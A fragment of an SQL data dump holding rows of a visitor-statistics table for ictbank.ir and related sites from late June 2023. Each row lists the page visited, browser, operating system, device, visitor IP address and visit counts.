(34634,'2023-06-20','https://ictbank.ir/blog','Chrome','Windows','42.0.0.0','desktop','Unknown','','142.54.161.122','000',0,1,0),
(34635,'2023-06-21','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','13.233.225.44','000',0,7,0),
(34636,'2023-06-21','https://45.92.94.221:443/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','83.97.73.89','000',0,22,0),
(34637,'2023-06-21','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(34638,'2023-06-21','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.138','000',0,2,0),
(34639,'2023-06-21','https://ictbank.ir/blog','Safari','OS X','16.0','desktop','Macintosh','','86.17.122.117','000',0,1,0),
(34640,'2023-06-21','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(34641,'2023-06-21','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.140','000',0,2,0),
(34642,'2023-06-21','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.254.250.177','000',0,1,0),
(34643,'2023-06-21','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.109','000',0,2,0),
(34644,'2023-06-21','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,10,0),
(34645,'2023-06-21','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(34646,'2023-06-21','https://ictbank.ir/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.57','000',0,1,0),
(34647,'2023-06-21','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.129.12','000',0,1,0),
(34648,'2023-06-21','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','153.122.7.122','000',0,1,0),
(34649,'2023-06-21','https://ictbank.ir/CMDB/admin/index.php?pid=services','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.160.29.66','000',0,15,0),
(34650,'2023-06-21','https://www.ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','185.233.19.41','000',0,2,0),
(34651,'2023-06-21','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','173.201.185.75','000',0,1,0),
(34652,'2023-06-21','https://45.92.94.221/blog','Chrome','Linux','86.0.0','desktop','Unknown','','118.123.105.90','000',0,8,0),
(34653,'2023-06-21','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.237.179.24','000',0,24,0),
(34654,'2023-06-21','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.18','000',0,2,0),
(34655,'2023-06-21','https://ictbank.ir/blog','Chrome','Windows','99.0.0.0','desktop','Unknown','','170.64.136.121','000',0,1,0),
(34656,'2023-06-21','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(34657,'2023-06-21','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.37','000',0,1,0),
(34658,'2023-06-21','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,3,0),
(34659,'2023-06-21','https://ictbank.ir/blog','Chrome','Windows','106.0.0.0','desktop','Unknown','','131.153.143.50','000',0,1,0),
(34660,'2023-06-21','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,4,0),
(34661,'2023-06-21','http://design-arena.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','142.93.48.245','000',0,1,0),
(34662,'2023-06-21','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','167.114.24.140','000',0,2,0),
(34663,'2023-06-21','http://design-arena.ir','Safari','iOS','9.0','tablet','iPad','','23.128.248.16','000',0,1,0),
(34664,'2023-06-21','https://ictbank.ir/blog/','Chrome','Windows','103.0.0.0','desktop','Unknown','','136.169.243.170','000',0,4,0),
(34665,'2023-06-21','https://ictbank.ir/blog','Chrome','Windows','87.0.0.0','desktop','Unknown','','148.72.125.0','000',0,1,0),
(34666,'2023-06-21','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.128.12','000',0,1,0),
(34667,'2023-06-21','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.141','000',0,2,0),
(34668,'2023-06-21','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','154.16.200.153','000',0,1,0),
(34669,'2023-06-21','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(34670,'2023-06-21','https://ictbank.ir/blog','Firefox','Windows','5.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(34671,'2023-06-21','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','108.179.253.165','000',0,1,0),
(34672,'2023-06-21','https://ictbank.ir/blog','Opera Mobile','Android','63.0.0.0','mobile:smart','Galaxy A70','','142.132.249.223','000',0,8,0),
(34673,'2023-06-21','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.140.6','000',0,1,0),
(34674,'2023-06-21','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(34675,'2023-06-21','https://ictbank.ir/blog','Unknown','Linux','Unknown','desktop','Unknown','','36.90.67.144','000',0,1,0),
(34676,'2023-06-21','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.79','000',0,1,0),
(34677,'2023-06-21','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.136.78','000',0,1,0),
(34678,'2023-06-21','https://ictbank.ir/blog','Chrome','Windows','87.0.0.0','desktop','Unknown','','202.149.70.10','000',0,1,0),
(34679,'2023-06-21','https://ictbank.ir/blog','Yandex Browser','Android','20.0.0.0.0','tablet','Tab 4 8','','79.174.70.211','000',0,1,0),
(34680,'2023-06-21','http://design-arena.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','93.113.110.128','000',0,1,0),
(34681,'2023-06-21','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','One Touch Pixi 3 (4)','','82.115.19.133','000',0,2,0),
(34682,'2023-06-21','https://ictbank.ir/blog','Chrome','Android','67.0.0.0','mobile:smart','Moto G Play','','185.110.189.65','000',0,2,0),
(34683,'2023-06-22','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','83.97.73.89','000',0,6,0),
(34684,'2023-06-22','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.47','000',0,1,0),
(34685,'2023-06-22','https://ictbank.ir/blog','Chrome','OS X','14.0.0.0','desktop','Macintosh','','208.80.194.126','000',0,2,0),
(34686,'2023-06-22','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','131.108.209.113','000',0,1,0),
(34687,'2023-06-22','https://ICTBANK.IR/BLOG/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','50.62.176.174','000',0,1,0),
(34688,'2023-06-22','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,4,0),
(34689,'2023-06-22','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(34690,'2023-06-22','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','207.180.197.101','000',0,127,0),
(34691,'2023-06-22','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','147.78.47.22','000',0,1,0),
(34692,'2023-06-22','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','44.204.55.189','000',0,2,0),
(34693,'2023-06-22','https://45.92.94.221/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.223','000',0,1,0),
(34694,'2023-06-22','https://45.92.94.221/blog/','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.10','000',0,1,0),
(34695,'2023-06-22','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(34696,'2023-06-22','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(34697,'2023-06-22','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.36','000',0,4,0),
(34698,'2023-06-22','http://ictbank.ir/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','180.163.220.47','000',0,1,0),
(34699,'2023-06-22','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','180.163.220.61','000',0,1,0),
(34700,'2023-06-22','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','180.163.220.45','000',0,1,0),
(34701,'2023-06-22','https://ictbank.ir/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','180.163.220.43','000',0,1,0),
(34702,'2023-06-22','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','180.163.220.60','000',0,2,0),
(34703,'2023-06-22','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,4,0),
(34704,'2023-06-22','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','101.36.97.137','000',0,9,0),
(34705,'2023-06-22','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','158.140.106.123','000',0,2,0),
(34706,'2023-06-22','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,4,0),
(34707,'2023-06-22','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','93.188.167.208','000',0,1,0),
(34708,'2023-06-22','https://mail.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.75','000',0,1,0),
(34709,'2023-06-22','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','18.237.184.16','000',0,1,0),
(34710,'2023-06-22','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(34711,'2023-06-22','https://ictbank.ir/blog','Chrome','OS X','101.0.0.0','desktop','Macintosh','','128.140.95.186','000',0,1,0),
(34712,'2023-06-22','http://design-arena.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','5.135.152.155','000',0,2,0),
(34713,'2023-06-22','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,2,0),
(34714,'2023-06-22','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,4,0),
(34715,'2023-06-22','https://ictbank.ir/blog/','Chrome','Windows','103.0.0.0','desktop','Unknown','','136.169.243.170','000',0,4,0),
(34716,'2023-06-22','https://ictbank.ir/blog','Chrome','Windows','11.0.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(34717,'2023-06-22','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','66.70.188.31','000',0,127,0),
(34718,'2023-06-22','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','71.6.199.23','000',0,2,0),
(34719,'2023-06-22','https://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','37.187.215.255','000',0,1,0),
(34720,'2023-06-22','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.140.6','000',0,2,0),
(34721,'2023-06-22','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.251.15.21','000',0,1,0),
(34722,'2023-06-22','https://45.92.94.221/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.101.3','000',0,1,0),
(34723,'2023-06-22','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.251.11.3','000',0,1,0),
(34724,'2023-06-22','https://45.92.94.221/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.78.6','000',0,1,0),
(34725,'2023-06-22','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.251.14.232','000',0,1,0),
(34726,'2023-06-22','https://45.92.94.221/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.94.161','000',0,1,0),
(34727,'2023-06-22','https://ictbank.ir/blog','Chrome','Windows','79.0','desktop','Unknown','','157.7.226.33','000',0,1,0),
(34728,'2023-06-22','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.188','000',0,2,0),
(34729,'2023-06-22','https://ictbank.ir/hooman/admin/','Chrome','OS X','114.0.0.0','desktop','Macintosh','','5.215.82.135','000',0,3,0),
(34730,'2023-06-22','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.11','000',0,1,0),
(34731,'2023-06-22','https://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','37.187.215.243','000',0,1,0),
(34732,'2023-06-22','https://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','37.187.215.247','000',0,1,0),
(34733,'2023-06-22','https://www.google.com/','Chrome','Windows','114.0.0.0','desktop','Unknown','','189.203.88.37','000',0,1,0),
(34734,'2023-06-22','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.109','000',0,2,0),
(34735,'2023-06-22','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','46.60.71.66','000',0,2,0),
(34736,'2023-06-22','https://www.google.de/','Chrome','Android','114.0.0.0','tablet','Unknown','','88.152.187.3','000',0,1,0),
(34737,'2023-06-22','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(34738,'2023-06-22','https://ictbank.ir/blog','Safari','OS X','Unknown','desktop','Macintosh','','217.138.193.189','000',0,5,0),
(34739,'2023-06-22','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.128.2','000',0,2,0),
(34740,'2023-06-22','https://ictbank.ir/blog','Chrome','Android','114.0.0.0','mobile:smart','Unknown','','66.220.149.14','000',0,1,0),
(34741,'2023-06-22','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.33.65','000',0,1,0),
(34742,'2023-06-23','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','83.97.73.89','000',0,13,0),
(34743,'2023-06-23','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(34744,'2023-06-23','https://ictbank.ir/blog/','Chrome','Windows','103.0.0.0','desktop','Unknown','','136.169.243.170','000',0,8,0),
(34745,'2023-06-23','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,6,0),
(34746,'2023-06-23','https://ictbank.ir/blog','Chrome','OS X','49.0.0.0','desktop','Macintosh','','79.137.202.106','000',0,2,0),
(34747,'2023-06-23','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.128.2','000',0,1,0),
(34748,'2023-06-23','https://www.google.com/','Safari','OS X','16.0','desktop','Macintosh','','190.215.241.86','000',0,1,0),
(34749,'2023-06-23','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','43.225.64.130','000',0,127,0),
(34750,'2023-06-23','https://ictbank.ir/blog','Chrome','Windows','9.0.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(34751,'2023-06-23','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,4,0),
(34752,'2023-06-23','https://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','138.197.20.240','000',0,2,0),
(34753,'2023-06-23','https://ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.41.193','000',0,1,0),
(34754,'2023-06-23','https://nikan-ai.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.34.187','000',0,1,0),
(34755,'2023-06-23','https://neginghavami.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.118.120','000',0,1,0),
(34756,'2023-06-23','https://ns10.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.33.65','000',0,1,0),
(34757,'2023-06-23','https://mail.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.44.114','000',0,2,0),
(34758,'2023-06-23','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','205.185.116.89','000',0,1,0),
(34759,'2023-06-23','https://www.ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.48.154','000',0,1,0),
(34760,'2023-06-23','https://www.neginghavami.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.36.112','000',0,1,0),
(34761,'2023-06-23','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(34762,'2023-06-23','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','139.162.211.102','000',0,1,0),
(34763,'2023-06-23','https://ns2.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.136.78','000',0,2,0),
(34764,'2023-06-23','https://45.92.94.221/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','118.193.45.5','000',0,1,0),
(34765,'2023-06-23','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.163.44','000',0,1,0),
(34766,'2023-06-23','https://ictbank.ir/blog','Firefox','Windows','57.0','desktop','Unknown','','137.184.199.197','000',0,1,0),
(34767,'2023-06-23','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','80.85.86.10','000',0,1,0),
(34768,'2023-06-23','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(34769,'2023-06-23','https://ictbank.ir/blog','Firefox','Windows','103.0','desktop','Unknown','','93.158.91.193','000',0,1,0),
(34770,'2023-06-23','https://ictbank.ir/blog','Firefox','Windows','103.0','desktop','Unknown','','93.158.91.205','000',0,2,0),
(34771,'2023-06-23','https://ictbank.ir/blog','Firefox','Windows','103.0','desktop','Unknown','','93.158.91.224','000',0,1,0),
(34772,'2023-06-23','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.158.37.190','000',0,1,0),
(34773,'2023-06-23','https://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','178.254.29.124','000',0,2,0),
(34774,'2023-06-23','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,3,0),
(34775,'2023-06-23','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.129.2','000',0,1,0),
(34776,'2023-06-23','http://design-arena.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','64.90.48.191','000',0,2,0),
(34777,'2023-06-23','http://ictbank.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','52.144.67.182','000',0,4,0),
(34778,'2023-06-23','https://ictbank.ir/blog','Firefox','OS X','84.0','desktop','Macintosh','','66.228.53.215','000',0,2,0),
(34779,'2023-06-23','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','176.58.121.82','000',0,2,0),
(34780,'2023-06-23','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(34781,'2023-06-23','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','39.99.182.168','000',0,9,0),
(34782,'2023-06-23','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.189.6.101','000',0,1,0),
(34783,'2023-06-23','https://ictbank.ir/blog','Chrome','Windows','9.0.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(34784,'2023-06-23','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,4,0),
(34785,'2023-06-23','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.129.7','000',0,2,0),
(34786,'2023-06-23','https://design-arena.ir/blog','Yandex Browser','Android','23.0.0.0.0','mobile:smart','Reno 5 Lite','','93.159.230.88','000',0,2,0),
(34787,'2023-06-23','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','23.128.248.10','000',0,1,0),
(34788,'2023-06-23','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','23.128.248.14','000',0,1,0),
(34789,'2023-06-23','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','103.251.167.21','000',0,2,0),
(34790,'2023-06-23','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','23.137.251.61','000',0,1,0),
(34791,'2023-06-23','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.103.5','000',0,3,0),
(34792,'2023-06-23','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','23.155.24.6','000',0,1,0),
(34793,'2023-06-23','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.101.136','000',0,1,0),
(34794,'2023-06-23','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','77.91.78.210','000',0,1,0),
(34795,'2023-06-23','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','23.129.64.131','000',0,1,0),
(34796,'2023-06-23','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','104.244.77.192','000',0,1,0),
(34797,'2023-06-23','https://ictbank.ir/blog','Chrome','OS X','113.0.0.0','desktop','Macintosh','','44.233.198.16','000',0,1,0),
(34798,'2023-06-23','http://design-arena.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','94.23.31.9','000',0,1,0),
(34799,'2023-06-23','http://ictbank.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','54.36.163.203','000',0,2,0),
(34800,'2023-06-23','https://design-arena.ir/blog','Chrome','Windows','106.0.0.0','desktop','Unknown','','167.235.31.3','000',0,2,0),
(34801,'2023-06-23','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.11','000',0,2,0),
(34802,'2023-06-23','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','109.74.206.98','000',0,2,0),
(34803,'2023-06-23','https://ictbank.ir/blog','Chrome','Android','113.0.0.0','mobile:smart','Galaxy A20','','193.42.32.80','000',0,21,0),
(34804,'2023-06-23','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','185.3.94.69','000',0,2,0),
(34805,'2023-06-23','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(34806,'2023-06-23','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','51.83.238.159','000',0,1,0),
(34807,'2023-06-23','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.36','000',0,1,0),
(34808,'2023-06-24','https://ictbank.ir/blog','Safari','iOS','10.0','mobile:smart','iPhone 13 Pro Max','','193.42.32.80','000',0,1,0),
(34809,'2023-06-24','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','83.97.73.89','000',0,20,0),
(34810,'2023-06-24','https://ictbank.ir/blog','Firefox','Windows','57.0','desktop','Unknown','','24.199.89.17','000',0,1,0),
(34811,'2023-06-24','https://ictbank.ir/blog','Chrome','Windows','72.0.0.0','desktop','Unknown','','78.163.129.185','000',0,2,0),
(34812,'2023-06-24','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.159.214.49','000',0,2,0),
(34813,'2023-06-24','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.129.7','000',0,1,0),
(34814,'2023-06-24','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.50','000',0,3,0),
(34815,'2023-06-24','https://ictbank.ir/blog','Chrome','Linux','5.0.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(34816,'2023-06-24','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(34817,'2023-06-24','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.3.232.23','000',0,2,0),
(34818,'2023-06-24','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,4,0),
(34819,'2023-06-24','https://ictbank.ir/blog/','Chrome','Windows','103.0.0.0','desktop','Unknown','','136.169.243.170','000',0,8,0),
(34820,'2023-06-24','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,2,0),
(34821,'2023-06-24','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,8,0),
(34822,'2023-06-24','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','165.140.84.85','000',0,1,0),
(34823,'2023-06-24','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,2,0),
(34824,'2023-06-24','http://ictbank.ir/','Chrome','Windows','114.0.0.0','desktop','Unknown','','34.217.18.90','000',0,7,0),
(34825,'2023-06-24','https://ictbank.ir/blog','Chrome','Windows','114.0.0.0','desktop','Unknown','','62.122.184.129','000',0,3,0),
(34826,'2023-06-24','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.237.184.212','000',0,56,0),
(34827,'2023-06-24','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','114.0.0.0','desktop','Unknown','','217.218.197.23','000',0,64,0),
(34828,'2023-06-24','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.34','000',0,1,0),
(34829,'2023-06-24','https://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(34830,'2023-06-24','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.220.193.182','000',0,1,0),
(34831,'2023-06-24','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','209.203.48.58','000',0,1,0),
(34832,'2023-06-24','https://ictbank.ir/blog','Firefox','Windows','57.0','desktop','Unknown','','137.184.199.166','000',0,1,0),
(34833,'2023-06-24','https://ictbank.ir/dashtpodcast/wp-content/uploads/2020/06/E10_image.jpg','Chrome','Android','71.0.0.0','mobile:smart','Galaxy A20','','5.209.197.53','000',0,3,0),
(34834,'2023-06-24','https://ictbank.ir/blog','Chrome','OS X','108.0.0.0','desktop','Macintosh','','176.9.114.107','000',0,1,0),
(34835,'2023-06-24','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.141','000',0,2,0),
(34836,'2023-06-24','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(34837,'2023-06-24','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','43.249.58.162','000',0,2,0),
(34838,'2023-06-24','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','54.38.44.6','000',0,2,0),
(34839,'2023-06-24','https://ICTBANK.IR/BLOG/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','92.204.33.4','000',0,1,0),
(34840,'2023-06-24','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.35','000',0,1,0),
(34841,'2023-06-24','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(34842,'2023-06-24','https://ictbank.ir/blog','Firefox','Windows','79.0','desktop','Unknown','','63.247.136.220','000',0,2,0),
(34843,'2023-06-24','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Galaxy S21 FE','','5.115.192.53','000',0,30,0),
(34844,'2023-06-24','https://ictbank.ir/blog','Chrome','Windows','42.0.0.0','desktop','Unknown','','45.61.185.191','000',0,3,0),
(34845,'2023-06-24','http://ictbank.ir/blog/connection-encryption-in-oracle-database/','Firefox','Fedora','102.0','desktop','Unknown','','167.88.166.208','000',0,2,0),
(34846,'2023-06-25','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','83.97.73.89','000',0,19,0),
(34847,'2023-06-25','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.36','000',0,1,0),
(34848,'2023-06-25','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(34849,'2023-06-25','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(34850,'2023-06-25','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','101.68.211.2','000',0,1,0),
